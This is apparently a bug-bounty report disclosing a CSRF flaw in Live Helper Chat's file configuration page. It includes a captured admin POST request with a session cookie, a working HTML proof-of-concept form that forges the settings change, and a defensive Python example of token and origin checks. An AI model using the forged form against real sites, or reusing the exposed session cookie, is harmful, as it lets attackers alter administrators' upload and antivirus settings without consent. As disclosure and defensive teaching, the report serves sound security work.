Cross-Site Request Forgery (CSRF) in livehelperchat/livehelperchat
Valid
Reported on
Jan 14th 2022
Description
A CSRF issue was found in Settings > Live help configuration > File Configuration. The handler behind that form performs no CSRF token validation: the form submits no CSRF token at all, so the POST is accepted on the strength of the session cookie alone.
Proof of Concept
Actual Request
POST /site_admin/file/configuration HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 395
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/file/configuration
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; PHPSESSID=dqj88jnn7p3es1tjobhpvckfj5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
ActiveFileUploadUser=on&ActiveFileUploadAdmin=on&AllowedFileTypes=gif%7Cjpe%3Fg%7Cpng%7Czip%7Crar%7Cxls%7Cdoc%7Cdocx%7Cxlsx%7Cpdf%7Cmp3&AllowedFileTypesUser=gif%7Cjpe%3Fg%7Cpng%7Cdoc%7Cdocx%7Cpdf%7Cmp3&MaximumFileSize=2048&ClamAVSocketPath=%2Fvar%2Frun%2Fclamav%2Fclamd.sock&ClamAVSocketLength=20000&soundMessagesOp=on&soundLength=30&mdays_older=&mdays_older_visitor=&StoreFileConfiguration=Save
Note that no CSRF token is sent along with the request. Nothing in it ties the submission to a user action on the site: the only credential is the PHPSESSID session cookie, which the browser attaches on its own, so the server cannot tell this request apart from the same form submitted from an attacker's page.
Attacker's POC
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.livehelperchat.com/site_admin/file/configuration" method="POST">
<input type="hidden" name="ActiveFileUploadUser" value="on" />
<input type="hidden" name="ActiveFileUploadAdmin" value="on" />
<input type="hidden" name="AllowedFileTypes" value="gif|jpe?g|png|zip|rar|xls|doc|docx|xlsx|pdf|mp3" />
<input type="hidden" name="AllowedFileTypesUser" value="gif|jpe?g|png|doc|docx|pdf|mp3" />
<input type="hidden" name="MaximumFileSize" value="2048" />
<input type="hidden" name="ClamAVSocketPath" value="/var/run/clamav/clamd.sock" />
<input type="hidden" name="ClamAVSocketLength" value="20000" />
<input type="hidden" name="soundMessagesOp" value="on" />
<input type="hidden" name="soundLength" value="30" />
<input type="hidden" name="mdays_older" value="" />
<input type="hidden" name="mdays_older_visitor" value="" />
<input type="hidden" name="StoreFileConfiguration" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Impact
An attacker who gets a logged-in administrator to open a crafted page can change the file configuration settings without the administrator's knowledge. The parameters in the request cover whether users and admins may upload files, the allowed file types for each, the maximum file size, the ClamAV socket path and length, and the retention settings, so all of these can be set to attacker-chosen values.
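The check the handler is missing, as an added example that is not Live Helper Chat's own code: a Python stand-in for a state-changing admin endpoint that parses a raw POST like the one above and accepts it only when it is same-origin and carries a token bound to the session. The session store, the `SITE_ORIGIN` constant, the `csrf_token` field name and the `build_post` helper are assumptions made for this example; the sample requests are constructed from the report's own request.

```python
"""
Added example (not Live Helper Chat code): the checks a state-changing admin
handler needs before it honours a POST such as /site_admin/file/configuration.
The session store, origin and helper names below are assumptions for this example.
"""
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

SITE_ORIGIN = "https://demo.livehelperchat.com"   # origin the admin panel is served from

# Stand-in for the server-side session store keyed by PHPSESSID (constructed).
SESSIONS = {"dqj88jnn7p3es1tjobhpvckfj5": {"user": "admin", "csrf_token": None}}


def parse_raw_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def cookies_from(headers):
    """Parse the Cookie header into a dict; only PHPSESSID matters here."""
    jar = {}
    for part in headers.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            jar[name] = value
    return jar


def issue_csrf_token(session):
    """Bind a fresh random token to the session; the form embeds it as a hidden field."""
    session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def csrf_check(raw_request):
    """Return (accepted, reason). Accept only same-origin POSTs carrying the session's token."""
    method, _path, headers, body = parse_raw_request(raw_request)
    if method in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"          # state changes must never hang off these

    session = SESSIONS.get(cookies_from(headers).get("PHPSESSID"))
    if session is None:
        return False, "no session"

    # 1. Fetch metadata: a form posted from another site arrives as Sec-Fetch-Site: cross-site.
    #    A subdomain ("same-site") is treated as untrusted too; the admin panel should not rely on it.
    sec_fetch_site = headers.get("sec-fetch-site")
    if sec_fetch_site is not None and sec_fetch_site != "same-origin":
        return False, f"sec-fetch-site is {sec_fetch_site}"

    # 2. Origin (falling back to Referer) must be the admin panel's own origin.
    origin = headers.get("origin")
    if origin is None and "referer" in headers:
        parts = urlsplit(headers["referer"])
        origin = f"{parts.scheme}://{parts.netloc}"
    if origin != SITE_ORIGIN:
        return False, f"origin mismatch: {origin!r}"

    # 3. Synchronizer token: the hidden field must equal the per-session secret (constant-time compare).
    submitted = parse_qs(body).get("csrf_token", [""])[0]
    expected = session.get("csrf_token")
    if not expected or not hmac.compare_digest(submitted.encode(), expected.encode()):
        return False, "missing or invalid csrf token"
    return True, "ok"


def build_post(origin, sec_fetch_site, body, session_id="dqj88jnn7p3es1tjobhpvckfj5"):
    """Construct a raw POST to the vulnerable endpoint with the given cross-site indicators."""
    return (
        "POST /site_admin/file/configuration HTTP/1.1\r\n"
        "Host: demo.livehelperchat.com\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Origin: {origin}\r\n"
        f"Sec-Fetch-Site: {sec_fetch_site}\r\n"
        f"Cookie: PHPSESSID={session_id}\r\n"
        "\r\n" + body
    )


# Trimmed copy of the report's form body (constructed sample input).
SETTINGS = "ActiveFileUploadUser=on&MaximumFileSize=2048&StoreFileConfiguration=Save"

if __name__ == "__main__":
    # The report's own request: same origin but no token, so the handler must still refuse it.
    print(csrf_check(build_post(SITE_ORIGIN, "same-origin", SETTINGS)))
    # The attacker's PoC page: the browser stamps the attacker's origin and cross-site on it.
    print(csrf_check(build_post("https://attacker.example", "cross-site", SETTINGS)))
    # A form rendered by the admin panel with the token embedded: accepted.
    token = issue_csrf_token(SESSIONS["dqj88jnn7p3es1tjobhpvckfj5"])
    print(csrf_check(build_post(SITE_ORIGIN, "same-origin", SETTINGS + "&csrf_token=" + token)))
```

The three checks are layered on purpose: the token is the actual defence, while the Sec-Fetch-Site and Origin checks reject the forged request before any session state is touched and keep working if a token ever leaks into a log. Marking the session cookie `SameSite=Lax` (PHP's `session.cookie_samesite`) is a further defence in depth, not a replacement for the token.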
Activity
We are processing your report and will contact the livehelperchat team within 24 hours.
4 months ago: shubh123-tri modified the report
4 months ago: The fix bounty has been dropped
@maintainer - can you confirm the version of the package that addresses this issue?